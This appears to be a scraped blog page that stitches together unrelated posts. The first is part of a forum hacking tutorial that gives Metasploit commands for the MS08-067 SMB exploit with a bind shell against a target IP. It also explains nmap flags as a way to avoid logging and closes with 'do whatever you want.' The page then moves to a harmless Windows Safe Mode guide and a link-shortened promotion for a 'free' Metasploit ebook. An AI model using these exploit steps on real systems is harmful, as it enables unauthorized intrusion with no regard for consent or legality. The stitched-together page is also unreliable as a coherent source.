The -sU command runs a udp port scan against the target, and since there is no reply from udp packets they never get logged in the first place. The -O scan runs an OS scan against the target using tcp fingerprinting to tell you the operating system of the target machine, this will also come to play when selecting an exploit. The -n command tells nmap to not run a -Pn or ping scan agianst the target as they get logged, and since you have already done that once you wouldn't want to do it again.
And again the -v command runs nmap in verbose mode which allows you to see more of whats going on in the behind the scenes and helps you better understand what is happening.

Now once you have a list of open ports you can begin to choose your exploit based on port and operating system. For this exercise I chose the windows/smb/ms08_067_netapi exploit.

Now since port 445 is open I will attempt to run the ms08_067_netapi exploit against the target. So with metasploit open we will run

Code:

use windows/smb/ms08_067_netapi
set payload windows/bind_tcp
set rhost 192.168.1.4
set lhost 192.168.1.3
set lport 5150
check

NOTE:Run the show options command to display what information is required for the exploit to work properly.



Now these commands in metasploit will first set the exploit to use as the windows/smb/ms08_067_netapi exploit.
The second sets metasploit to use a bind shell using tcp protocal.



The third sets the remote host to our target ip. The fourth sets the localhost to our ip, and the local port the one we want to listen on.
Running the check command will tell us if the target is vulnerable or not.

And as you can see it is. So now we will run the exploit command

Code:

exploit

From there meterpreter will open. You can go here for all the meterpreter commands.



Now your in.... All you need to do is to do whatever you want. LOL
This Has been another ultra noob edition tutorial.

References

http://www.backtrack-linux.org/forums/ba...resql.html

http://hackforums.net/showthread.php?tid=970352

If I missed a ref or something let me know. I will fix it immediatly.

P.S. Will be adding things and command explanations as necissary just P.M. me for any help or explanations.

Also would very much appreciate feedback on what I could improve within the tut and whether or not it was enjoyed/helpful.




P.S.S. Am still making the cracking WPA with aircrack tutorial.... pretty much was just too lazy to do it recently as i am going to be a father... :)

---

Really? no feedback or anything about this post? Thats disapointing.. if i cant get more then a single thank you i might as well stop making tuts

Read more »

How to Get to Safe Mode in Windows XP/Vista/7

There are times when it is better to run Windows in what is known as “Safe Mode,” which is a diagnostic setup. Its purpose is to help troubleshoot computer problems by operating with a bare minimum of drivers and Windows components.

Open Safe Mode with the F8 key

All Windows versions can be booted into Safe Mode by this method. Note that it is somewhat tricky to time this procedure and it may take several attempts.

1. Turn on or restart your computer.
2. Hold down the F8 key before the Windows logo appears. If the computer makes a complaining noise, tap the F8 key repeatedly instead of holding it down.
3. If a Windows logo or “Windows starting” appears, wait until Windows loads. Then restart the computer and try pressing  F8 again.
4. Once you are successful, a menu will appear with a number of boot options. Use an arrow key to navigate to “Safe Mode” and press the Enter key.

Trying to get to Safe Mode by using the F8 key can be frustrating and there is another way that uses the System Configuration Utility (msconfig).

System Configuration Utility in Windows XP

1. Open the Start menu and click “Run.”
2. In the Run box, enter “msconfig” (without quotes).
3. Click “OK.”
4. Select the tab “BOOT.INI.”
5. Put a check by the entry /SAFEBOOT. Also click the radio button MINIMAL.
6. Click “Apply” and “OK.”
7. Restart the computer. The system should open in Safe Mode.

When finished using Safe Mode, open msconfig again and remove the check by /SAFEBOOT. Otherwise, you will continue to open in Safe Mode whenever you boot.

System Configuration Utility in Windows 7/Vista

1. Open the Start menu.
2. Enter “msconfig” (without quotes) in the box labeled Start search (Vista) or Search programs and files (Windows 7).
3. Click the entry “msconfig” or “msconfig.exe” shown in the programs list.
4. Select the “Boot” tab.
5. In the “Boot options” section, check “Safe boot.” Also, make sure the radio button “Minimal” is selected.
6. Click “OK’
7. Restart the computer

When you are finished with Safe Mode, go back to msconfig and remove the check by “Safe boot” that was applied in step 5 above.



Get your own favorite tip published!  Know a neat tech tip or trick?  Then why not have it published here and receive full credit?  Click here to tell us your tip.

This tips section is maintained by Vic Laurie. Vic runs a Windows blog called The PC Informant and also operates a computer education website.

Click here for more items like this. Better still, get Tech Tips delivered via your RSS feeder or alternatively, have the RSS feed sent as email direct to your in-box.

Read more »

Learn Full Metasploit (Free Ebook By Ownedsec)

Learn Full Metasploit (Free Ebook By Ownedsec)

First step to Last step
$485 for free

'HACK THE PLANET'

here is the link
http://adf.ly/35XQT

NO SHARE CASH LINKS

Read more »